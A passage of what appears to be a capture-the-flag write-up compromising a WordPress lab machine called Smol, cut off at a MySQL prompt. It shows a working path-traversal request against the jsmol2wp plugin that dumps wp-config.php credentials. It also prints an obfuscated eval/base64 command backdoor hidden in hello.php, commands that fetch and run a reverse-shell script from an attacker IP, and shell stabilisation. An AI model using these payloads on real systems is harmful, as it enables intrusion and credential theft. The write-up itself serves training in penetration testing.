== Changelog == = 1.07 = fix extremely stupid svn error where\nneeded files from the j2s directory were not in the repo = 1.06 = change rcsb\nfile path to avoid redirect = 1.05 = load rcsb pdb files via https instead of\nhttp = 1.04 = * updated jsmol package from Jmol sourceforge * first attempt at\ninternationalization ** Added idioma directory from jsMol distributions **\nAdded set language directive based on wordpress get_locale() = 1.03 = * updated\njsmol package from Jmol sourceforge * Remove beta from help.htm * fix bug where\nload param was not working = 1.02 = * fixes to this readme.txt file to improve\nthe display at the wordpress.org plugin repository = 1.01 = * tweaks for\nwordpress.org deposition = 1.0 = * update JSmol code to 14.3.12_2015.01.28 *\nprepare for release to wordpress.org plugin repository = 0.94 beta = * add\nisosurface support * rewrite the code to set up structure loading * replace WP\nget_page_by_title with a function that matches the filename * add jvxl to file\ntypes * fixed bug where caption nonmatching required casting match as a string.\n* move the help demo page to a more stable URL. = 0.93 beta = * set default\ntype based on fileurl extension if present * fix bug where reset button failed\nwith data from fileurl = 0.92 beta = * change appletID to not require $acc. =\n0.9 beta = * improve help page * improve uniqueness identifiers for multiple\nJmolapplets on the same post\/page; add the option to hand code instances *\nimprove debug messages (or at least change them) * make reset button standard\nand have it remember the load commands * standard buttons depend on the type of\nmolecule loaded. 
* add some semicolons to the template to try to fix lint\nwarnings: http:\/\/www.javascriptlint.com\/online_lint.php = 0.8 beta = * removed\ndata directory * changed system for counting instances of the shorttag so we\ndon&#039;t need preg_match * removed whitespace from template hoping that solves the\nproblem of themes adding markup * simplified load script as suggested by Bob\nHansen * made applet IDs more unique by appending post id = 0.7 beta = * update\njsmol libraries to 4.1.7_2014.06.09 * add dependencies for jquery-ui-core and\njquery-ui-menu fixes popup problem in some themes * refactor to support\nadditional file types (in progress) * fix multiline regex bug * fix bug that\ncaused failure to load when permalinks used ?p=post_number format * debug\nconstructor * debug view ..* add path to uploaded file ..* add test for\nget_page_by_title = 0.6 alpha = * register script before enqueueing it. * added\nability to add Jmol.script commands * added the ability to add jmolCommandInput\n= 0.5 alpha = * added wrap and debug options = 0.4 alpha = * changed to nojq. *\nmodified command processing to not split on allowed characters in Jmol syntax.\n= 0.3 alpha = * changed default to spin off in order to save client cpu *\ncustom command buttons working. = 0.2 alpha = * changed system to use a\ntemplate based on the distro file simple1.htm. 
* added captioning * works with\nlocal or remote pdb files from rcsb.org\/pdb = 0.1 pre-alpha = * basic shortcode\nworking with uploaded pdb file * adds .pdb chemical\/pdb mime type to allowed\nmime types * handles multiple shortcodes on the same page<\/code><\/pre>\n<p>\u7248\u672c\u4e3a<code>1.07<\/code>\uff0c\u8fdb\u884c\u67e5\u8be2<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550970.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550970.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607105707878\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u67e5\u770b\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">{{BaseURL}}\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php:\/\/filter\/resource=..\/..\/..\/..\/wp-config.php<\/code><\/pre>\n<p>\u53d1\u73b0\u67e5\u5230\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s &quot;http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php:\/\/filter\/resource=..\/..\/..\/..\/wp-config.php&quot;\n&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don&#039;t have to 
use the web site, you can copy this file to &quot;wp-config.php&quot;\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( &#039;DB_NAME&#039;, &#039;wordpress&#039; );\n\n\/** Database username *\/\ndefine( &#039;DB_USER&#039;, &#039;wpuser&#039; );\n\n\/** Database password *\/\ndefine( &#039;DB_PASSWORD&#039;, &#039;kbLSF2Vop#lw3rjDZ629*Z%G&#039; );\n\n\/** Database hostname *\/\ndefine( &#039;DB_HOST&#039;, &#039;localhost&#039; );\n\n\/** Database charset to use in creating database tables. *\/\ndefine( &#039;DB_CHARSET&#039;, &#039;utf8&#039; );\n\n\/** The database collate type. Don&#039;t change this if in doubt. *\/\ndefine( &#039;DB_COLLATE&#039;, &#039;&#039; );\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! 
You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( &#039;AUTH_KEY&#039;,         &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_KEY&#039;,  &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_KEY&#039;,    &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_KEY&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;AUTH_SALT&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_SALT&#039;, &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_SALT&#039;,   &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_SALT&#039;,       &#039;put your unique phrase here&#039; );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix = &#039;wp_&#039;;\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( &#039;WP_DEBUG&#039;, false );\n\n\/* Add any custom values between this line and the &quot;stop editing&quot; line. *\/\n\n\/* That&#039;s all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( ! defined( &#039;ABSPATH&#039; ) ) {\n        define( &#039;ABSPATH&#039;, __DIR__ . 
&#039;\/&#039; );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . &#039;wp-settings.php&#039;;<\/code><\/pre>\n<p>It also leaks user credentials:<\/p>\n<pre><code class=\"language-bash\">wpuser\nkbLSF2Vop#lw3rjDZ629*Z%G<\/code><\/pre>\n<p>Try logging in; the default login page is <code>http:\/\/www.smol.hmv\/wp-admin<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550971.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550971.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607110621178\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Login succeeded! Then some useful information turned up:<\/p>\n<pre><code class=\"language-bash\"># Webmaster Tasks!! 
\u2014 Private\n\n1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of &quot;Hello Dolly&quot; plugin as the site&#039;s code revision.\n\n2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.\n\n3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.\n\n4- Strong Passwords: Enforce strong passwords for users and administrators.\n\n5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.\n\n6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.\n\n7- Backup Strategy: Set up regular backups of your website and databases.\n\n8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.\n\n9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.\n\n10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.\n\n11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.<\/code><\/pre>\n<p>The note suggests the <code>Hello Dolly<\/code> plugin may contain something exploitable; look at its source code:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550972.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550972.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607111244700\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550973.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550973.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607111313460\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The file is named <code>hello.php<\/code>; use the file inclusion vulnerability to read its source:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s &quot;http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php:\/\/filter\/resource=..\/..\/hello.php&quot; \n&lt;?php\n\/**\n * @package Hello_Dolly\n * @version 1.7.2\n *\/\n\/*\nPlugin Name: Hello Dolly\nPlugin URI: http:\/\/wordpress.org\/plugins\/hello-dolly\/\nDescription: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. 
When activated you will randomly see a lyric from &lt;cite&gt;Hello, Dolly&lt;\/cite&gt; in the upper right of your admin screen on every page.\nAuthor: Matt Mullenweg\nVersion: 1.7.2\nAuthor URI: http:\/\/ma.tt\/\n*\/\n\nfunction hello_dolly_get_lyric() {\n        \/** These are the lyrics to Hello Dolly *\/\n        $lyrics = &quot;Hello, Dolly\nWell, hello, Dolly\nIt&#039;s so nice to have you back where you belong\nYou&#039;re lookin&#039; swell, Dolly\nI can tell, Dolly\nYou&#039;re still glowin&#039;, you&#039;re still crowin&#039;\nYou&#039;re still goin&#039; strong\nI feel the room swayin&#039;\nWhile the band&#039;s playin&#039;\nOne of our old favorite songs from way back when\nSo, take her wrap, fellas\nDolly, never go away again\nHello, Dolly\nWell, hello, Dolly\nIt&#039;s so nice to have you back where you belong\nYou&#039;re lookin&#039; swell, Dolly\nI can tell, Dolly\nYou&#039;re still glowin&#039;, you&#039;re still crowin&#039;\nYou&#039;re still goin&#039; strong\nI feel the room swayin&#039;\nWhile the band&#039;s playin&#039;\nOne of our old favorite songs from way back when\nSo, golly, gee, fellas\nHave a little faith in me, fellas\nDolly, never go away\nPromise, you&#039;ll never go away\nDolly&#039;ll never go away again&quot;;\n\n        \/\/ Here we split it into lines.\n        $lyrics = explode( &quot;\\n&quot;, $lyrics );\n\n        \/\/ And then randomly choose a line.\n        return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );\n}\n\n\/\/ This just echoes the chosen line, we&#039;ll position it later.\nfunction hello_dolly() {\n        eval(base64_decode(&#039;CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=&#039;));\n\n        $chosen = hello_dolly_get_lyric();\n        $lang   = &#039;&#039;;\n        if ( &#039;en_&#039; !== substr( get_user_locale(), 0, 3 ) ) {\n                $lang = &#039; lang=&quot;en&quot;&#039;;\n        }\n\n        printf(\n                
&#039;&lt;p id=&quot;dolly&quot;&gt;&lt;span class=&quot;screen-reader-text&quot;&gt;%s &lt;\/span&gt;&lt;span dir=&quot;ltr&quot;%s&gt;%s&lt;\/span&gt;&lt;\/p&gt;&#039;,\n                __( &#039;Quote from Hello Dolly song, by Jerry Herman:&#039; ),\n                $lang,\n                $chosen\n        );\n}\n\n\/\/ Now we set that function up to execute when the admin_notices action is called.\nadd_action( &#039;admin_notices&#039;, &#039;hello_dolly&#039; );\n\n\/\/ We need some CSS to position the paragraph.\nfunction dolly_css() {\n        echo &quot;\n        &lt;style type=&#039;text\/css&#039;&gt;\n        #dolly {\n                float: right;\n                padding: 5px 10px;\n                margin: 0;\n                font-size: 12px;\n                line-height: 1.6666;\n        }\n        .rtl #dolly {\n                float: left;\n        }\n        .block-editor-page #dolly {\n                display: none;\n        }\n        @media screen and (max-width: 782px) {\n                #dolly,\n                .rtl #dolly {\n                        float: none;\n                        padding-left: 0;\n                        padding-right: 0;\n                }\n        }\n        &lt;\/style&gt;\n        &quot;;\n}\n\nadd_action( &#039;admin_head&#039;, &#039;dolly_css&#039; );<\/code><\/pre>\n<p>Decode this <code>base64<\/code> string:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ echo &quot;CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA&quot; | base64 -d\n\n if (isset($_GET[&quot;\\143\\155\\x64&quot;])) { system($_GET[&quot;\\143\\x6d\\144&quot;]); }<\/code><\/pre>\n<p>The inner and outer strings look the same; check them:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ printf 
&quot;\\143\\155\\x64&quot;      \ncmd                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ printf &quot;\\143\\x6d\\144&quot;\ncmd <\/code><\/pre>\n<p>This is clearly a backdoor; try using it to get a shell:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s &quot;http:\/\/www.smol.hmv\/wp-content\/plugins\/hello.php?cmd=wget+http:\/\/192.168.10.101:8888\/revshell.sh+-O+\/tmp\/revshell.sh&quot; <\/code><\/pre>\n<p>Other common commands produced no output either, so I had to wonder whether it runs at all. Digging further, it appears to be a plugin that plays songs, and not much use.....<\/p>\n<p>While digging around I found where this plugin is enabled:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550974.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550974.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607140832735\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>It is displayed every time the admin dashboard is opened. Check whether our dashboard shows it; if it does, the dashboard page calls <code>hello.php<\/code>, so a reverse shell can be attempted:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550975.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550975.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607141011103\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Found it, baka!!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550976.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550976.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607141043009\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>Try executing commands and getting a reverse shell!!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550978.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550978.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607141739005\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Tried the reverse shell, but it would not execute; try uploading a file and using that instead:<\/p>\n<pre><code class=\"language-bash\">http:\/\/www.smol.hmv\/wp-admin\/index.php?cmd=wget http:\/\/192.168.10.101:8888\/revshell.sh -O \/tmp\/revshell.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550979.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550979.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607142254599\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>The request succeeded; try executing it:<\/p>\n<pre><code class=\"language-bash\">http:\/\/www.smol.hmv\/wp-admin\/index.php?cmd=\/bin\/bash%20\/tmp\/revshell.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550980.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550980.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607142413973\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The shell connected back!!!!<\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Stabilizing the shell<\/h3>\n<p>Same as usual....<\/p>\n<pre><code class=\"language-bash\">python3 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;\n# script \/dev\/null -c bash\nexport TERM=xterm\nCtrl + Z\nstty raw -echo; fg\n# kali stty size\nstty rows 44 columns 189<\/code><\/pre>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">www-data@smol:\/var\/www\/wordpress\/wp-admin$ cd ~\nwww-data@smol:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 root     root     4096 Mar 29  2024 .\ndrwxr-xr-x 13 root     root     4096 Mar 29  2024 ..\ndrwxr-xr-x  2 root     root     4096 Mar 29  2024 html\ndrwxr-x---  5 www-data www-data 4096 Jun  7 02:03 wordpress\nwww-data@smol:\/var\/www$ cd html\nwww-data@smol:\/var\/www\/html$ ls -la\ntotal 24\ndrwxr-xr-x 2 root root  4096 Mar 29  2024 .\ndrwxr-xr-x 4 root root  4096 Mar 29  2024 ..\n-rw-r--r-- 1 
root root 10918 Mar 29  2024 index.html.default\n-rw-r--r-- 1 root root   258 Mar 29  2024 index.php\nwww-data@smol:\/var\/www\/html$ cd ..\/wordpress\/\nwww-data@smol:\/var\/www\/wordpress$ ls -la\ntotal 252\ndrwxr-x---  5 www-data www-data  4096 Jun  7 02:03 .\ndrwxr-xr-x  4 root     root      4096 Mar 29  2024 ..\n-rw-r--r--  1 www-data www-data   523 Aug 16  2023 .htaccess\n-rw-r--r--  1 www-data www-data   405 Aug 16  2023 index.php\n-rw-r--r--  1 www-data www-data 19903 Jun  7 02:02 license.txt\n-rw-r--r--  1 www-data www-data  7425 Jun  7 02:02 readme.html\n-rw-r--r--  1 www-data www-data  7387 Jun  7 02:02 wp-activate.php\ndrwxr-xr-x  9 www-data www-data  4096 Aug 16  2023 wp-admin\n-rw-r--r--  1 www-data www-data   351 Aug 16  2023 wp-blog-header.php\n-rw-r--r--  1 www-data www-data  2323 Aug 16  2023 wp-comments-post.php\n-rw-r--r--  1 www-data www-data  3336 Jun  7 02:02 wp-config-sample.php\n-rw-r--r--  1 www-data www-data  3008 Mar 29  2024 wp-config.php\ndrwxr-xr-x  8 www-data www-data  4096 Jun  7 02:03 wp-content\n-rw-r--r--  1 www-data www-data  5617 Jun  7 02:02 wp-cron.php\ndrwxr-xr-x 30 www-data www-data 16384 Jun  7 02:02 wp-includes\n-rw-r--r--  1 www-data www-data  2502 Aug 16  2023 wp-links-opml.php\n-rw-r--r--  1 www-data www-data  3937 Jun  7 02:02 wp-load.php\n-rw-r--r--  1 www-data www-data 51414 Jun  7 02:02 wp-login.php\n-rw-r--r--  1 www-data www-data  8727 Jun  7 02:02 wp-mail.php\n-rw-r--r--  1 www-data www-data 30081 Jun  7 02:02 wp-settings.php\n-rw-r--r--  1 www-data www-data 34516 Jun  7 02:02 wp-signup.php\n-rw-r--r--  1 www-data www-data  5102 Jun  7 02:02 wp-trackback.php\n-rw-r--r--  1 www-data www-data  3205 Jun  7 02:02 xmlrpc.php\nwww-data@smol:\/var\/www\/wordpress$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nthink\nfwupd-refresh\nxavi\ndiego\ngege\nwww-data@smol:\/var\/www\/wordpress$ ls -la \/home\/\ntotal 24\ndrwxr-xr-x  6 root  root     4096 Aug 16  2023 .\ndrwxr-xr-x 18 root  root     4096 Mar 29  2024 
..\ndrwxr-x---  2 diego internal 4096 Aug 18  2023 diego\ndrwxr-x---  2 gege  internal 4096 Aug 18  2023 gege\ndrwxr-x---  5 think internal 4096 Jan 12  2024 think\ndrwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi<\/code><\/pre>\n<h3>Database leak<\/h3>\n<p>Try looking at the database:<\/p>\n<pre><code class=\"language-bash\">www-data@smol:\/var\/www\/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G\nmysql: [Warning] Using a password on the command line interface can be insecure.\nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 524\nServer version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)\n\nCopyright (c) 2000, 2024, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nmysql&gt; show 